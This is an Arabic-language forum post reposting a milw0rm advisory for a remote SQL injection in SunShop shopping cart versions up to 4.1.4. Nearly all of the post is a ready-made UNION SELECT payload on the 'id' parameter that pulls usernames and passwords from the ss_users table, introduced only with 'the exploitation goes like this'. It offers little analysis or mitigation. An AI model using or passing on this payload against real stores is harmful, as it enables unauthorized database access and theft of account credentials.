عرض مشاركة واحدة
 
قديم 08-20-2008, 02:02 PM   #1 (permalink)
Qtr Linux
عضو مميز
 
الصورة الرمزية Qtr Linux







Qtr Linux غير متصل

Qtr Linux will become famous soon enoughQtr Linux will become famous soon enough

افتراضي SunShop <= 4.1.4 (id) Remote SQL Injection Vulnerability

SunShop <= 4.1.4 (id) Remote SQL Injection Vulnerability

################################################## ########
# Vendor : Turnkey Web Tools, Inc
# URL : Shopping Cart Software & Ecommerce Solutions: Turnkey Web Tools, Inc.
# Version : SunShop <= 4.1.4
# Risk : SQL Injection
################################################## ########

الاستغلال بيكون كذا

id=-99' UNION SELECT 1,2,3,concat(username,char(58),password),5,6 FROM ss_users/*



-------------------------------



http://milw0rm.com/exploits/6273

التوقيع

الكبير طول عمره كبير

  رد مع اقتباس